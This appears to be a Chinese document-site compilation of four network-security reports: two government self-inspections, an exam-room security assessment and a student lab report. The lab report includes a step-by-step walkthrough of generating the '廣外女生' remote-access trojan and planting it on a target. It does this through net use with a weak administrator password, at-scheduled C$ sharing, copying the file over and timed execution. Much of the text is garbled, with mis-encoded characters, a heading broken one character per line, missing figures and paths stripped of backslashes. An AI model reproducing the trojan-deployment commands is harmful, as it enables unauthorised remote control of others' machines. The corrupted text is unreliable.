第一篇：XX年網(wǎng)絡(luò)信息安全自查自糾報(bào)告

XX年網(wǎng)絡(luò)信息安全自查自糾報(bào)告

市信息辦：

為了貫徹落實(shí)《關(guān)于加強(qiáng)全省政務(wù)信息網(wǎng)和政府網(wǎng)站安全保障工作的緊急通知》的精神，切實(shí)加強(qiáng)北京奧運(yùn)會(huì)期間政務(wù)信息網(wǎng)運(yùn)行管理和全省政府網(wǎng)站安全防范工作，嚴(yán)防黑客攻擊、網(wǎng)絡(luò)中斷、病毒傳播、信息失竊密，為奧運(yùn)會(huì)順利舉辦創(chuàng)造良好的網(wǎng)絡(luò)信息環(huán)境，現(xiàn)就我縣網(wǎng)絡(luò)信息安全自查自糾情況匯報(bào)如下：

一、高度重視加強(qiáng)奧運(yùn)會(huì)期間網(wǎng)絡(luò)信息安全工作

我信息中心接到市信息辦轉(zhuǎn)發(fā)的《關(guān)于加強(qiáng)北京奧運(yùn)會(huì)期間全省政務(wù)信息網(wǎng)和政府網(wǎng)站安全保障工作的緊急通知》后，從維護(hù)社會(huì)穩(wěn)定、經(jīng)濟(jì)命脈、人民利益的政治高度，充分認(rèn)識(shí)做好奧運(yùn)會(huì)期間網(wǎng)絡(luò)信息安全工作的極端重要性和緊迫性，緊急行動(dòng)起來，立即進(jìn)行安排部署，落實(shí)責(zé)任，強(qiáng)化防護(hù)措施，加強(qiáng)對(duì)本單位網(wǎng)絡(luò)和信息系統(tǒng)的安全保護(hù),做好我縣轄區(qū)內(nèi)的網(wǎng)絡(luò)和信息系統(tǒng)的安全防范和安全技術(shù)指導(dǎo)工作。

二、按要求嚴(yán)格落實(shí)網(wǎng)絡(luò)信息安全各項(xiàng)制度

1．責(zé)任制度。對(duì)網(wǎng)絡(luò)信息安全各項(xiàng)制度進(jìn)行了全面梳理，重點(diǎn)抓好安全責(zé)任制、應(yīng)急預(yù)案、值班值守、信息發(fā)布審核等制度的落實(shí)。

嚴(yán)格落實(shí)領(lǐng)導(dǎo)責(zé)任制，一把手親自過問，分管負(fù)責(zé)人直接抓,一級(jí)抓一級(jí),層層抓落實(shí)。

2．原則要求。堅(jiān)決執(zhí)行“誰主管誰負(fù)責(zé)、誰運(yùn)行誰負(fù)責(zé)、誰使用誰負(fù)責(zé)、誰發(fā)布誰負(fù)責(zé)”和屬地化管理的原則，認(rèn)真履行網(wǎng)絡(luò)信息安全保障職責(zé)。

3．“五到位”。堅(jiān)決做到領(lǐng)導(dǎo)、機(jī)構(gòu)、人員、責(zé)任、措施“五到位”。健全安全工作機(jī)制，對(duì)發(fā)生重大安全責(zé)任事故的，要嚴(yán)肅追究相關(guān)人員的責(zé)任。

三、進(jìn)一步強(qiáng)化安全防范措施

1．清查網(wǎng)站隱患。針對(duì)政府網(wǎng)站和應(yīng)用系統(tǒng)的程序升級(jí)、賬戶、口令、軟件補(bǔ)丁、殺病毒、外部接口以及服務(wù)器托管、網(wǎng)站維護(hù)、政務(wù)網(wǎng)接入和運(yùn)行等方面存在的突出問題，我們逐一進(jìn)行清理、排查，能及時(shí)更新升級(jí)的更新升級(jí)，進(jìn)一步強(qiáng)化安全防范措施，及時(shí)堵塞漏洞、消除隱患、化解風(fēng)險(xiǎn)。

2．加強(qiáng)安全策略管理?？焖賹?duì)面臨的網(wǎng)絡(luò)信息安全風(fēng)險(xiǎn)、已有的網(wǎng)絡(luò)信息安全防護(hù)措施開展了一次有針對(duì)性的檢查。重點(diǎn)是防病毒，并強(qiáng)制個(gè)別單位查殺完病毒后再接入我政務(wù)網(wǎng)。

3．強(qiáng)化政務(wù)內(nèi)網(wǎng)和政務(wù)專網(wǎng)（政務(wù)外網(wǎng)）物理隔離。我們針對(duì)本單位和轄區(qū)內(nèi)政務(wù)網(wǎng)用戶，重點(diǎn)清查了政務(wù)內(nèi)網(wǎng)和政務(wù)專網(wǎng)的接入情況，排除了政務(wù)內(nèi)網(wǎng)和政務(wù)專網(wǎng)共用設(shè)備、混接等安全隱患，政務(wù)內(nèi)網(wǎng)和政務(wù)專網(wǎng)（政務(wù)外網(wǎng)）嚴(yán)格實(shí)行了物理隔離。

4．嚴(yán)格執(zhí)行網(wǎng)絡(luò)信息安全“五禁止”規(guī)定。能夠按要求禁止將涉密信息系統(tǒng)接入國(guó)際互聯(lián)網(wǎng)及其他公共信息網(wǎng)絡(luò)，能夠禁止在沒有防護(hù)措施的情況下將國(guó)際互聯(lián)網(wǎng)等公共信息網(wǎng)絡(luò)上的數(shù)據(jù)拷貝到涉密信息系統(tǒng)，能夠禁止將涉密與非涉密網(wǎng)絡(luò)混用，能夠禁止將涉密與非涉密計(jì)算機(jī)、移動(dòng)存儲(chǔ)設(shè)備混用，能夠禁止使用具有無線互聯(lián)功能的設(shè)備處理涉密信息。

5．加強(qiáng)內(nèi)部安全的責(zé)任管理?？h政府網(wǎng)站自去年6月份并入我信息中心以來，我們就規(guī)范了信息的采集、審核和發(fā)布流程，堅(jiān)持“誰發(fā)布誰負(fù)責(zé)”，嚴(yán)格信息發(fā)布審核程序。奧運(yùn)期間將組織安排專人值班，定期檢查網(wǎng)站和網(wǎng)絡(luò)的運(yùn)行情況，嚴(yán)防被黑。

四、認(rèn)真抓好網(wǎng)絡(luò)信息安全自查和整改

通過自查，我們發(fā)現(xiàn)我信息中心安全隱患還是存在，原因是由于經(jīng)費(fèi)問題一直未配置防火墻，待經(jīng)費(fèi)解決后，隨著防火墻的配置，涉及到的有關(guān)問題逐步解決，將會(huì)進(jìn)一步加強(qiáng)網(wǎng)絡(luò)信息安全管理。

第二篇：網(wǎng)絡(luò)信息安全評(píng)估報(bào)告

計(jì)算機(jī)信息安全評(píng)估報(bào)告

如何

實(shí)

現(xiàn)

如

下

圖

所

示

可用性1.人們通常采用一些技術(shù)措施或網(wǎng)絡(luò)安全設(shè)備來實(shí)現(xiàn)這些目標(biāo)。例如：

使用防火墻，把攻擊者阻擋在網(wǎng)絡(luò)外部，讓他們“迚不來”。

即使攻擊者迚入了網(wǎng)絡(luò)內(nèi)部，由于有加密機(jī)制，會(huì)使他們“改不了”和“拿不走”關(guān) 鍵信息和資源。

機(jī)密性2機(jī)密性將對(duì)敏感數(shù)據(jù)的訪問權(quán)限控制在那些經(jīng)授權(quán)的個(gè)人，只有他們才能查看數(shù)據(jù)。機(jī)密性可防止向未經(jīng)授權(quán)的個(gè)人泄露信息，或防止信息被加工。

如圖所示，“迚不來”和“看不懂”都實(shí)現(xiàn)了信息系統(tǒng)的機(jī)密性。

人們使用口令對(duì)迚入系統(tǒng)的用戶迚行身份鑒別，非法用戶沒有口令就“迚不來”，這就保證了信息系統(tǒng)的機(jī)密性。

即使攻擊者破解了口令，而迚入系統(tǒng)，加密機(jī)制也會(huì)使得他們“看不懂”關(guān)鍵信息。例如，甲給乙發(fā)送加密文件，只有乙通過解密才能讀懂其內(nèi)容，其他人看到的是亂碼。由此便實(shí)現(xiàn)了信息的機(jī)密性。

完整性3如圖所示，“改不了”和“拿不走”都實(shí)現(xiàn)了信息系統(tǒng)的完整性。使用加密機(jī)制，可以保證信息系統(tǒng)的完整性，攻擊者無法對(duì)加密信息迚行修改或者復(fù)制。

不可抵賴性4如圖所示，“跑不掉”就實(shí)現(xiàn)了信息系統(tǒng)的不可抵賴性。如果攻擊者迚行了非法操作，系統(tǒng)管理員使用審計(jì)機(jī)制或簽名機(jī)制也可讓他們無所遁形

對(duì)考試的機(jī)房迚行“管理制度”評(píng)估。（1）評(píng)估說明

為規(guī)范管理,保障計(jì)算機(jī)設(shè)備的正常運(yùn)行,創(chuàng)造良好的上機(jī)環(huán)境,必須制定相關(guān)的管理制度

（2）評(píng)估內(nèi)容

沒有建立相應(yīng)信息系統(tǒng)運(yùn)行管理規(guī)程、缺陷管理制度、統(tǒng)計(jì)匯報(bào)制度、運(yùn)維流程、值班制度，沒有實(shí)行工作票制度；機(jī)房出入管理制度上墻，但沒有機(jī)房迚出情況記錄（3）評(píng)估分析報(bào)告

所存在問題：1沒有系統(tǒng)的相關(guān)負(fù)責(zé)人，機(jī)房也是誰人都可以自由出入。2在上機(jī)過程中做與學(xué)習(xí)無關(guān)的工作。3機(jī)房財(cái)產(chǎn)規(guī)劃不健全等（4）評(píng)估建議

1、計(jì)算機(jī)室的管理由系統(tǒng)管理員負(fù)責(zé)，非機(jī)房工作人員未經(jīng)允許不準(zhǔn)迚入。未經(jīng)許可不得擅自上機(jī)操作和對(duì)運(yùn)行設(shè)備及各種配置迚行更改。

2、保持機(jī)房?jī)?nèi)清潔、安靜，嚴(yán)禁機(jī)房?jī)?nèi)吸煙、吐痰以及大聲喧嘩；嚴(yán)禁將易燃、易爆、易污染和強(qiáng)磁物品帶入機(jī)房。

3、機(jī)房?jī)?nèi)的一切物品，未經(jīng)管理員同意，不得隨意挪動(dòng)，拆卸和帶出機(jī)房。

4、上機(jī)時(shí)，應(yīng)先認(rèn)真檢查機(jī)器情況，如有問題應(yīng)及時(shí)向機(jī)房管理員反應(yīng)。

5、上機(jī)人員不得在機(jī)房?jī)?nèi)迚行與上機(jī)考試無關(guān)的計(jì)算機(jī)操作。

6、上機(jī)時(shí)應(yīng)按規(guī)定操作，故意或因操作不當(dāng)造成設(shè)備損壞，除照價(jià)賠償外，視情節(jié)輕重給予處罰。對(duì)考試的機(jī)房迚行“物理安全”評(píng)估。（1）評(píng)估說明

防火，防水，防塵，防腐蝕，主機(jī)房安裝門禁、監(jiān)控與報(bào)警系統(tǒng)。（2）評(píng)估內(nèi)容 主機(jī)房沒有安裝門禁、監(jiān)控系統(tǒng)，有消防報(bào)警系統(tǒng)。（3）評(píng)估分析報(bào)告

沒有詳細(xì)的機(jī)房配線圖，機(jī)房供甴系統(tǒng)將動(dòng)力、照明用甴與計(jì)算機(jī)系統(tǒng)供甴線路是分開的，機(jī)房沒有配備應(yīng)急照明裝置，有定期對(duì)UPS的運(yùn)行狀況迚行檢測(cè)但沒有檢測(cè)記錄。

（4）評(píng)估建議

有詳細(xì)的機(jī)房配線圖，機(jī)房供甴系統(tǒng)將動(dòng)力、照明用甴與計(jì)算機(jī)系統(tǒng)供甴線路分開，機(jī)房配備應(yīng)急照明裝置，定期對(duì)UPS的運(yùn)行狀況迚行檢測(cè)（查看半年內(nèi)檢測(cè)記錄）對(duì)考試的機(jī)房迚行“計(jì)算機(jī)系統(tǒng)安全”評(píng)估。（1）評(píng)估說明

應(yīng)用系統(tǒng)的角色、權(quán)限分配有記錄；用戶賬戶的變更、修改、注銷有記錄（半年記錄情況）；關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作迚行審計(jì)幵迚行長(zhǎng)期存儲(chǔ)；對(duì)關(guān)鍵應(yīng)用系統(tǒng)有應(yīng)急預(yù)案；關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前迚行安全性測(cè)試。

（2）評(píng)估內(nèi)容

營(yíng)銷系統(tǒng)的角色、權(quán)限分配有記錄，其余系統(tǒng)沒有；用戶賬戶的變更、修改、注銷沒有記錄；關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作沒有迚行審計(jì)；沒有針對(duì)關(guān)鍵應(yīng)用系統(tǒng)的應(yīng)急預(yù)案；關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令有定期迚行變更；有些新系統(tǒng)上線前沒有迚行過安全性測(cè)試。

（3）評(píng)估分析報(bào)告

網(wǎng)絡(luò)中的防火墻位置部署合理，防火墻規(guī)則配置符合安全要求，防火墻規(guī)則配置的建立、更改有規(guī)范申請(qǐng)、審核、審批流程，對(duì)防火墻日志迚行存儲(chǔ)、備份。

（4）評(píng)估建議

完善系統(tǒng)的角色、權(quán)限分配有記錄；記錄用戶賬戶的變更、修改、注銷（半年記錄情況）；關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作迚行審計(jì)；制定針對(duì)關(guān)鍵應(yīng)用系統(tǒng)的應(yīng)急預(yù)案；關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前應(yīng)嚴(yán)格按照相關(guān)標(biāo)準(zhǔn)迚行安全性測(cè)試。

對(duì)考試的機(jī)房迚行“網(wǎng)絡(luò)與通信安全”評(píng)估。（1）評(píng)估說明

按標(biāo)準(zhǔn)部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)、針對(duì)安全設(shè)備的日志服務(wù)器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風(fēng)險(xiǎn)評(píng)估。

（2）評(píng)估內(nèi)容

沒有部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)，沒有漏洞掃描系統(tǒng)，重要系統(tǒng)沒有迚行信息安全風(fēng)險(xiǎn)評(píng)估，沒有部署針對(duì)安全設(shè)備的日志服務(wù)器。

（3）評(píng)估分析報(bào)告

按標(biāo)準(zhǔn)部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)、針對(duì)安全設(shè)備的日志服務(wù)器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風(fēng)險(xiǎn)評(píng)估。

（4）評(píng)估建議

部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年內(nèi)迚行信息安全風(fēng)險(xiǎn)評(píng)估，部署針對(duì)安全設(shè)備的日志服務(wù)器。

信息安全評(píng)估：

對(duì)考試的機(jī)房迚行“日志與統(tǒng)計(jì)安全”評(píng)估。（1）評(píng)估說明

每天計(jì)算機(jī)上機(jī)記錄日志在冊(cè)，對(duì)系統(tǒng)迚行不定時(shí)的還原。對(duì)本局半年內(nèi)發(fā)生的較大的、或者發(fā)生次數(shù)較多的信息安全事件迚行匯總記錄，形成本單位的安全事件列表

（2）評(píng)估內(nèi)容

已成立了信息安全領(lǐng)導(dǎo)機(jī)構(gòu)，但尚未成立信息安全工作機(jī)構(gòu)。

（3）評(píng)估分析報(bào)告

局域網(wǎng)核心交換設(shè)備、城域網(wǎng)核心路由設(shè)備應(yīng)采取設(shè)備冗余或準(zhǔn)備備用設(shè)備，不允許外聯(lián)鏈路繞過防火墻，具有當(dāng)前準(zhǔn)確的網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)圖

（4）評(píng)估建議

完善信息安全組織機(jī)構(gòu)，成立信息安全工作機(jī)構(gòu)。

第三篇：【企業(yè)網(wǎng)絡(luò)】網(wǎng)絡(luò)信息安全報(bào)告

XX中型企業(yè)網(wǎng)安全 網(wǎng)絡(luò)信息安全報(bào)告

一、實(shí)驗(yàn)?zāi)康募耙?/p>

該專周的目標(biāo)是讓學(xué)生掌握網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。以及了解計(jì)算機(jī)網(wǎng)絡(luò)安全方面的管理、配置和維護(hù)。

本課程要求在理論教學(xué)上以必需夠用為原則，應(yīng)盡量避免過深過繁的理論探討，重在理解網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測(cè)技術(shù)以及學(xué)習(xí)網(wǎng)絡(luò)病毒防治。了解Windows 2000的安全、Web的安全、網(wǎng)絡(luò)安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學(xué)生對(duì)計(jì)算機(jī)的使用有一定了解（了解Windows的使用，具有鍵盤操作和文件處理的基礎(chǔ)），并已經(jīng)掌握計(jì)算機(jī)網(wǎng)絡(luò)的基本原理。

二、專周內(nèi)容

1、安全需求分析

（1）網(wǎng)絡(luò)安全問題主要集中在對(duì)服務(wù)器的安全保護(hù)、防黑客和病毒、重要網(wǎng)段的保護(hù)及管理安全上。因此，我們必須采取相應(yīng)的安全措施杜絕安全隱患，其中應(yīng)該做到：

A、公開服務(wù)器的安全保護(hù) B、防止黑客從外部攻擊 C、入侵檢測(cè)與監(jiān)控 D、病毒防護(hù) E、數(shù)據(jù)安全保護(hù) F、網(wǎng)絡(luò)的安全管理

（2）解決網(wǎng)絡(luò)安全問題的一些要求

A、大幅度地提高系統(tǒng)的安全性（重點(diǎn)是可用性和可控性）；

B、保持網(wǎng)絡(luò)原有的特點(diǎn)，即對(duì)網(wǎng)絡(luò)的協(xié)議和傳輸具有良好的透明性，能透明接入，無需更改網(wǎng)絡(luò)設(shè)置；

C、易于操作、維護(hù)，并便于自動(dòng)化管理，而不增加或少增加附加操作；

D、盡量不影響原網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，同時(shí)便于系統(tǒng)及系統(tǒng)功能的擴(kuò)展；

E、安全保密系統(tǒng)具有較好的性能價(jià)格比。一次性投資，可以長(zhǎng)期使用；

F、安全產(chǎn)品具有合法性，及經(jīng)過國(guó)家有關(guān)管理部門的認(rèn)可或認(rèn)證；

（3）系統(tǒng)安全目標(biāo)

A、建立一套完整可行的網(wǎng)絡(luò)安全與網(wǎng)絡(luò)管理策略；

B、將內(nèi)部網(wǎng)絡(luò)、公開服務(wù)器網(wǎng)絡(luò)和外網(wǎng)進(jìn)行有效隔離，避免與外部網(wǎng)絡(luò)直接通信；

C、建立網(wǎng)站各主機(jī)和服務(wù)器的安全保護(hù)措施，保證他們的系統(tǒng)安全；

D、加強(qiáng)合法用戶的訪問認(rèn)證，同時(shí)將用戶的訪問權(quán)限控制在最低限度；

E、全面監(jiān)視對(duì)公開服務(wù)器的訪問，及時(shí)發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為；

F、加強(qiáng)對(duì)各種訪問的審計(jì)工作，詳細(xì)記錄對(duì)網(wǎng)絡(luò)、公開服務(wù)器的訪問行為，形成完整的系統(tǒng)日志；

2、網(wǎng)絡(luò)拓?fù)?/p>

3、網(wǎng)絡(luò)安全的基本內(nèi)容

（1）基本網(wǎng)絡(luò)命令

A、ping命令： ping –t IP，向指定的計(jì)算機(jī)不停的發(fā)送數(shù)據(jù)包，按Ctr+Break快捷鍵可以查看統(tǒng)計(jì)信息并繼續(xù)運(yùn)行，按 Ctr+C可中止運(yùn)行。

B、Tracert命令：tracert IP 顯示從本地計(jì)算機(jī)到目標(biāo)服務(wù)器所經(jīng)過的計(jì)算機(jī)：

C、pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計(jì)算丟失包的%

（2）操作系統(tǒng)安全

A、屏蔽不需要的服務(wù)組件

開始——程序——管理工具——服務(wù) 出現(xiàn)以下窗口：

然后在該對(duì)話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止”命令，同時(shí)將“啟動(dòng)類型”設(shè)置為“手動(dòng)”或“已禁用”，這樣就可以對(duì)指定的服務(wù)組進(jìn)行屏蔽了。B、關(guān)閉默認(rèn)共享：“開始”——“程序”——“管理工具”——“服務(wù)”——“Server”

（3）數(shù)據(jù)庫(kù)系統(tǒng)安全

A、使用安全的帳號(hào)策略和Windows認(rèn)證模式

由于SQL Server不能更改sa用戶名稱，也不能刪除這個(gè)超級(jí)用戶，所以，我們必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù)，當(dāng)然，包括使用一個(gè)非常強(qiáng)壯的密碼，最好不要在數(shù)據(jù)庫(kù)應(yīng)用中使用sa帳號(hào)，只有當(dāng)沒有其它方法登錄到 SQL Server 實(shí)例(例如，當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時(shí)才使用 sa?？梢孕陆⒁粋€(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來管理數(shù)據(jù)庫(kù)。安全的帳號(hào)策略還包括不要讓管理員權(quán)限的帳號(hào)泛濫。

SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。在任何可能的時(shí)候，應(yīng)該對(duì)指向SQL Server的連接要求Windows身份驗(yàn)證模式。

Windows認(rèn)證模式比混合模式更優(yōu)越，原因在以下：

1)它通過限制對(duì)Microsoft Windows用戶和域用戶帳戶的連接，保護(hù)SQL Server免受大部分Internet工具的侵害。

2)服務(wù)器將從Windows安全增強(qiáng)機(jī)制中獲益，例如更強(qiáng)的身份驗(yàn)證協(xié)議以及強(qiáng)制的密碼復(fù)雜性和過期時(shí)間。

3)使用Windows認(rèn)證，不需要將密碼存放在連接字符串中。存儲(chǔ)密碼是使用標(biāo)準(zhǔn)SQL Server登錄的應(yīng)用程序的主要漏洞之一。

4)Windows認(rèn)證意味著你只需要將密碼存放在一個(gè)地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗(yàn)證模式，步驟操作： 展開服務(wù)器組——右鍵點(diǎn)擊服務(wù)器——然后點(diǎn)擊“屬性”——在安全性選項(xiàng)卡的身份驗(yàn)證中——點(diǎn)擊“僅限Windows”。（4）網(wǎng)絡(luò)防火墻工具：紅墻主機(jī)網(wǎng)絡(luò)防火墻 安裝

1.具體操作如下：

第一步： 將“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻”的安裝光盤插入驅(qū)動(dòng)器，運(yùn)行根目錄下的Setup文件來運(yùn)行其安裝程序，進(jìn)入“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻安裝”窗口；

第二步：

在“歡迎安裝愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻”對(duì)話框中，單擊“下一步”按鈕；

第三步： 在“軟件許可協(xié)議”對(duì)話框，接受協(xié)議點(diǎn)擊“是”；

第四步： 點(diǎn)擊“是”按鈕，出現(xiàn)顯示您計(jì)算機(jī)的相關(guān)信息，即判斷是否可以安裝本軟件；

第五步： 單擊“下一步”按鈕，出現(xiàn)“選擇目標(biāo)位置”對(duì)話框；

第六步： 在該對(duì)話框中，單擊“瀏覽”按鈕，并在“選擇文件夾”對(duì)話框中選擇盤符作為驅(qū)動(dòng)器，再指定相應(yīng)的文件夾及路徑，然后單擊“確定”按鈕；

第七步： 單擊“下一步”按鈕，出現(xiàn)“選擇安裝程序名稱”對(duì)話框，您可自定義程序名稱；

第八步： 單擊“下一步”按鈕，系統(tǒng)開始復(fù)制文件；

第九步： 進(jìn)入“紅墻主機(jī)網(wǎng)絡(luò)防火墻配置”窗口，作出是否運(yùn)行“紅墻應(yīng)用程序掃描系統(tǒng)”的選擇后，點(diǎn)擊“完成”。

相關(guān)設(shè)置：告警設(shè)置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據(jù)需要選取告警設(shè)置。

點(diǎn)擊主界面中的“規(guī)則管理”按鈕，彈出相應(yīng)窗口，如下圖：

網(wǎng)絡(luò)監(jiān)控中心：

（5）網(wǎng)絡(luò)攻擊工具：“廣外女生”

它的基本功能有：文件管理方面有上傳，下載，刪除，改名，設(shè)置屬性，建立文件夾和運(yùn)行指定文件等功能；注冊(cè)表操作方面：全面模擬WINDOWS的注冊(cè)表編輯器，讓遠(yuǎn)程注冊(cè)表編輯工作有如在本機(jī)上操作一樣方便；屏幕控制方面：可以自定義圖片的質(zhì)量來減少傳輸?shù)臅r(shí)間，在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對(duì)方的鼠標(biāo)及鍵盤，就像操縱自己的計(jì)算機(jī)一樣；遠(yuǎn)程任務(wù)管理方面，可以直觀地瀏覽對(duì)方窗體，隨意殺掉對(duì)方窗體或其中的控件；其他功能還有郵件IP通知等。

主要步驟：首先運(yùn)行“gwg.exe”，出現(xiàn)如圖窗口：

選中“服務(wù)端設(shè)置”，生成“GDUFS.exe”木馬：

然后將“GDUFS.exe”復(fù)制到自己的C盤中，再根據(jù)一些命令把“GDUFS.exe”復(fù)制到目標(biāo)主機(jī)的盤中，再進(jìn)行運(yùn)行。目標(biāo)主機(jī)的IP：191.168.12.38 具體步驟及命令：

“開始”——“運(yùn)行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 與目標(biāo)主機(jī)之間建立聯(lián)系

命令：net time 191.168.12.38 獲取目標(biāo)主機(jī)的時(shí)間

命令：at 191.168.12.38 08:21 net share c$=c: 與目標(biāo)主機(jī)的C盤建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 復(fù)制“GDUFS.exe”文件到目標(biāo)主機(jī)的C盤中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標(biāo)主機(jī)中什么時(shí)候運(yùn)行。

三、專周小結(jié)：

通過這次網(wǎng)絡(luò)安全專周，我不僅僅是學(xué)到了很多知識(shí)，更是透徹的理解到了網(wǎng)絡(luò)安全對(duì)生活已經(jīng)將來工作的意義。

網(wǎng)絡(luò)安全分為軟件網(wǎng)絡(luò)安全和硬件網(wǎng)絡(luò)安全。一般我們說的網(wǎng)絡(luò)安全就是軟件上的網(wǎng)絡(luò)安全，即局域網(wǎng)，互聯(lián)網(wǎng)安全。

網(wǎng)絡(luò)安全又分為內(nèi)網(wǎng)安全和外網(wǎng)安全。在內(nèi)外網(wǎng)安全中，內(nèi)網(wǎng)安全則是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計(jì)，全國(guó)因?yàn)閮?nèi)網(wǎng)安全的問題，至少每年算是幾億美元。所以，網(wǎng)絡(luò)安全特別重要。

至于在將來的工作中，我們也要嚴(yán)格尊市網(wǎng)絡(luò)設(shè)備管理原則和使用秩序，對(duì)設(shè)備進(jìn)行統(tǒng)一管理專人負(fù)責(zé)，嚴(yán)格要求自己對(duì)設(shè)備進(jìn)行安全操作，保持強(qiáng)烈的責(zé)任感和服務(wù)意識(shí)，做好每一個(gè)細(xì)節(jié)，重點(diǎn)做好以下幾項(xiàng)工作：

1，及時(shí)準(zhǔn)確判斷網(wǎng)絡(luò)故障，做好上門維護(hù)工作或及時(shí)提醒網(wǎng)絡(luò)合作商進(jìn)行維護(hù)。

2，定期檢查維護(hù)各網(wǎng)絡(luò)設(shè)備的運(yùn)行情況并進(jìn)行維護(hù)。3，不定期對(duì)服務(wù)器進(jìn)行更新和檢查。

4，遇到特殊情況，及時(shí)向領(lǐng)導(dǎo)和老師匯報(bào)，努力提高應(yīng)急處理問題和獨(dú)立處理問題的能力。

感謝老師對(duì)我們的教導(dǎo)。

第四篇：2011網(wǎng)絡(luò)與信息安全情況報(bào)告

2011年網(wǎng)絡(luò)與信息安全檢查情況的報(bào)告

2011年，在省政府辦公廳和省工信廳的指導(dǎo)下，我局進(jìn)一步加強(qiáng)了網(wǎng)絡(luò)信息安全制度建設(shè)，不斷強(qiáng)化日常檢查與防護(hù)管理，配備健全了網(wǎng)絡(luò)信息安全設(shè)備，部署開展了信息保密與安全培訓(xùn)及督導(dǎo)工作，確保了網(wǎng)絡(luò)與信息安全?，F(xiàn)將我局2011年網(wǎng)絡(luò)與信息安全自查情況報(bào)告如下：

一、網(wǎng)絡(luò)與信息安全工作落實(shí)情況

1、重視制度建設(shè)，加強(qiáng)日常信息安全管理工作。為進(jìn)一步加強(qiáng)網(wǎng)絡(luò)與信息安全的管理工作，今年以來，我局重新修訂了網(wǎng)絡(luò)與信息安全制度，并下發(fā)各處室貫徹執(zhí)行。

2、加強(qiáng)重點(diǎn)部位的設(shè)備更新。新購(gòu)進(jìn)了一臺(tái)聯(lián)想網(wǎng)御防火墻，兩臺(tái)三層交換機(jī)安裝在網(wǎng)絡(luò)機(jī)房，將服務(wù)器群組劃分至統(tǒng)一的VLAN下，并與辦公用電腦網(wǎng)段分開，直接將服務(wù)器接至硬件防火墻下。對(duì)門戶網(wǎng)站服務(wù)器、郵件服務(wù)器和文件服務(wù)器重新進(jìn)行布署，對(duì)全局所有接入互聯(lián)網(wǎng)的電腦在服務(wù)器端進(jìn)行IP與MAC地址綁定，并實(shí)名登記上網(wǎng)。在服務(wù)器端關(guān)閉了不必要的端口，定期修補(bǔ)系統(tǒng)漏洞，定期更換

口令，定期備份數(shù)據(jù)，分析系統(tǒng)日志。

3、加強(qiáng)日常的管理、檢查和督導(dǎo)工作。除定期監(jiān)測(cè)系統(tǒng)流量，分析病毒日志，進(jìn)行安全檢查外，在元旦、五

一、國(guó)慶節(jié)以及慶祝建黨90周年等重要時(shí)期，還專門下發(fā)通知，加強(qiáng)全局網(wǎng)絡(luò)與信息安全檢查工作。

4、強(qiáng)化責(zé)任意識(shí)，加強(qiáng)信息化安全培訓(xùn)工作。今年以來，全局共進(jìn)行了三期網(wǎng)絡(luò)與信息安全培訓(xùn)，并與有關(guān)處室、單位負(fù)責(zé)信息網(wǎng)絡(luò)安全工作人員簽訂了保密協(xié)議。

二、網(wǎng)絡(luò)與信息自查問題及整改落實(shí)情況

經(jīng)認(rèn)真對(duì)照網(wǎng)絡(luò)與信息安全制度，對(duì)全局網(wǎng)絡(luò)設(shè)備進(jìn)行了自查，主要發(fā)現(xiàn)兩個(gè)問題：

1、存儲(chǔ)介質(zhì)存在混用情況。由于工作人員使用存儲(chǔ)介質(zhì)過于普遍，加之使用時(shí)相對(duì)私密，造成管理難度大。

解決方法：對(duì)涉密計(jì)算機(jī)統(tǒng)一貼出保密警示標(biāo)志，禁用USB端口，并定期檢查涉密計(jì)算機(jī)的使用日志，杜絕非法使用存儲(chǔ)介質(zhì)和交叉感染機(jī)會(huì)。

2、網(wǎng)絡(luò)與安全信息經(jīng)費(fèi)少。由于辦公經(jīng)費(fèi)緊張，導(dǎo)致網(wǎng)絡(luò)與信息安全維護(hù)經(jīng)費(fèi)投入較少，安全設(shè)備更新慢，有些重點(diǎn)部位的設(shè)備配備較為簡(jiǎn)單，有些設(shè)備因長(zhǎng)期負(fù)載趨于老化、防護(hù)能力有限。

解決方法：向財(cái)政和網(wǎng)絡(luò)與信息安全管理部門申請(qǐng)專項(xiàng)維護(hù)經(jīng)費(fèi)，彌補(bǔ)資缺口，加快設(shè)備更新步伐。

三、網(wǎng)絡(luò)與信息安全工作的經(jīng)驗(yàn)與建議

